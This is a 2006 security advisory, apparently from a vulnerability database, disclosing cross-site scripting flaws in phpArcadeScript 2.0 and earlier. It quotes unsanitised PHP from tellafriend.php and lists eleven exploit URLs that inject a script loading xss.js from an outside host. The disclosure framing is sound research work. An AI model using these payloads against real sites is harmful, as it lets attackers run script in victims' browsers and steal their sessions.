Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11696
HistoryMar 05, 2006 - 12:00 a.m.

phpArcadeScript XSS Injections

2006-03-0500:00:00
vulners.com
20

——–summary
software: phpArcadeScript
vendors website: http://www.phparcadescript.com/
versions: <= 2.0
class: remote
status: unpatched
exploit: available
solution: not available
discovered by: retard and jim
risk level: medium

——– description
due to phpArcadeScript excessive use of global variables attackers
can very easily inject xss into various portions of the application

    in ./includes/tellafriend.php:

21 22 if ($about == "game")
23 {
24 echo $gamename;
25 }
26
27 else
28 {
29 echo $site_title;
30 }
31 ?>

    this poor coding is repetative throughought the application, possibly
    having more vulnerabilities present in the coding.

——– exploit(s)

http://example.com/includes/tellafriend.php?about=game&amp;gamename=&#37;3CSCRIPT&#37;20SRC=http://notlegal.ws/xss.js&#37;3E&#37;3C/SCRIPT&#37;3E

http://example.com/admin/loginbox.php?loginstatus=1&amp;login_status=&#37;3CSCRIPT&#37;20SRC=http://notlegal.ws/xss.js&#37;3E&#37;3C/SCRIPT&#37;3E

http://example.com/index.php?action=tradelinks&amp;submissionstatus=&#37;3CSCRIPT&#37;20SRC=http://notlegal.ws/xss.js&#37;3E&#37;3C/SCRIPT&#37;3E

http://example.com/includes/browse.php?cell_title_background_color=&#37;22&#37;3E&#37;3CSCRIPT&#37;20SRC=http://notlegal.ws/xss.js&#37;3E&#37;3C/SCRIPT&#37;3E

http://example.com/includes/browse.php?browse_cat_id=1&amp;browse_cat_name=&#37;3CSCRIPT&#37;20SRC=http://notlegal.ws/xss.js&#37;3E&#37;3C/SCRIPT&#37;3E

http://example.com/includes/displaygame.php?filetype=1&amp;gamefile=&#37;22&#37;3E&#37;3CSCRIPT&#37;20SRC=http://notlegal.ws/xss.js&#37;3E&#37;3C/SCRIPT&#37;3E

http://example.com/includes/displaygame.php?filetype=2&amp;gamefile=&#37;22&#37;3E&#37;3CSCRIPT&#37;20SRC=http://notlegal.ws/xss.js&#37;3E&#37;3C/SCRIPT&#37;3E

http://example.com/includes/displaygame.php?filetype=3&amp;gamefile=&#37;22&#37;3E&#37;3CSCRIPT&#37;20SRC=http://notlegal.ws/xss.js&#37;3E&#37;3C/SCRIPT&#37;3E

http://example.com/includes/displaygame.php?filetype=4&amp;gamefile=&#37;22&#37;3E&#37;3CSCRIPT&#37;20SRC=http://notlegal.ws/xss.js&#37;3E&#37;3C/SCRIPT&#37;3E

http://example.com/includes/displaygame.php?filetype=5&amp;gamefile=&#37;22&#37;3E&#37;3CSCRIPT&#37;20SRC=http://notlegal.ws/xss.js&#37;3E&#37;3C/SCRIPT&#37;3E

http://example.com/includes/displaygame.php?filetype=6&amp;gamefile=&#37;22&#37;3E&#37;3CSCRIPT&#37;20SRC=http://notlegal.ws/xss.js&#37;3E&#37;3C/SCRIPT&#37;3E

——– credit
author(s): retard and jim
email: [email protected]